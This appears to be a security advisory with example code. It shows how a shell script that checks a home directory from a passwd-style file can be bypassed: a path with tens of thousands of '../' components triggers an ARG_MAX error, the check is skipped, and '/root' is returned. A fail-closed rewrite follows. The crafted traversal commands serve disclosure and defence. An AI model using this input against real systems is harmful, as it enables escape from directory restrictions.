• This code extracts a string from passwd.txt in the current directory and finally passes it to realpath. Before passing it to realpath, the string is checked.

    In the example that will be shown, it is assumed that /home/user1 exists.

    passwd.txt is a bit like /etc/passwd and is intended for data where the first column is the user name and the sixth column is the directory.

    $ echo 'user1:::::/home/user1:/bin/sh' > passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user1
    /home/user1

    So what happens if the sixth column is something like "/home/user1/../../root"?

    $ echo 'user2:::::/home/user1/../../root:/bin/sh' >> passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user2
    error: invalid dir

    It is properly recognized as fraudulent. So what happens when we do this?

    $ printf 'user3:::::/home/user1/' >> passwd.txt
    $ yes '../' | head -43685 | tr -d '\n' >> passwd.txt
    $ printf 'root:/bin/sh\n' >> passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user3
    ./cdwdoc-2023-001_sample_dir3.sh: 9: /bin/echo: Argument list too long
    /root

    We got a "/root" output.

    When trying cdwdoc-2023-001_sample_dir.sh as a stand-alone script from a terminal, the user trying it is themselves affected by the ARG_MAX limit.

    In the case of cdwdoc-2023-001_sample_dir3.sh, the attackers themselves may not be affected by the ARG_MAX limit.

    cdwdoc-2023-001_sample_dir.sh is here: https://gitlab.com/-/snippets/2487375
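A way to do the same lookup so that the check fails closed, written here as an added example (it is not the snippet's own script, which is not reproduced on this page; the assumption that the original passes the sixth field to /bin/echo and then realpath is taken from the "Argument list too long" message above). The field is never handed to an exec'd program: its length is bounded in the shell, ".." components are resolved lexically with builtins, and any failure on the way rejects the entry instead of letting it through.

```sh
#!/bin/sh
# Added example (not the snippet's code): fail-closed home-directory lookup
# from a passwd-style file. No external program ever receives the untrusted
# field as an argument, so ARG_MAX cannot turn the check off.

# Linux caps one exec argument at 128 KiB and the whole list at ARG_MAX, but a
# path can never exceed PATH_MAX (4096), so that is the bound enforced here.
MAX_DIR_LEN=4096

# normalize_dir PATH: print the lexically normalized absolute path.
# Exit 1 if PATH is not absolute or is longer than MAX_DIR_LEN.
# The body runs in a subshell so `set -f` and IFS changes do not leak.
normalize_dir() (
    dir=$1
    case $dir in
        /*) ;;
        *) exit 1 ;;
    esac
    [ "${#dir}" -le "$MAX_DIR_LEN" ] || exit 1
    set -f                      # no globbing while splitting on "/"
    IFS=/
    set -- $dir
    out=
    for comp in "$@"; do
        case $comp in
            ''|.) ;;                    # empty ("//") and "." add nothing
            ..) out=${out%/*} ;;        # pop one component; "" stays ""
            *) out="$out/$comp" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
)

# lookup_home FILE USER: print USER's home directory if, after
# normalization, it still lies under /home/. Exit 1 otherwise.
lookup_home() {
    file=$1
    user=$2
    while IFS=: read -r name _pw _uid _gid _gecos dir _shell; do
        [ "$name" = "$user" ] || continue
        norm=$(normalize_dir "$dir") || return 1
        case $norm in
            /home/*) printf '%s\n' "$norm"; return 0 ;;
            *) return 1 ;;
        esac
    done < "$file"
    return 1                    # unknown user is also a rejection
}

# make_sample_passwd FILE: constructed data mirroring the page's session:
# a sane home, a "../" escape, and a "../" run long enough to exceed ARG_MAX
# if it were ever passed to an exec'd /bin/echo.
make_sample_passwd() {
    f=$1
    printf 'user1:::::/home/user1:/bin/sh\n' > "$f"
    printf 'user2:::::/home/user1/../../root:/bin/sh\n' >> "$f"
    printf 'user3:::::/home/user1/' >> "$f"
    i=0
    while [ "$i" -lt 43685 ]; do printf '../'; i=$((i + 1)); done >> "$f"
    printf 'root:/bin/sh\n' >> "$f"
}

# Demo: user1 is accepted, user2 and user3 are both rejected.
sample=$(mktemp)
make_sample_passwd "$sample"
for u in user1 user2 user3; do
    if home=$(lookup_home "$sample" "$u"); then
        printf '%s: %s\n' "$u" "$home"
    else
        printf '%s: error: invalid dir\n' "$u"
    fi
done
rm -f "$sample"
```

The design point is that the validation and the normalization both happen inside the shell process; the only external command is `mktemp` for the demo file. If a script does need `realpath`, the length check must come first and the exit status of every command in the check must be tested, because an exec failure with E2BIG leaves the "checked" string untouched and the script continues with it.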
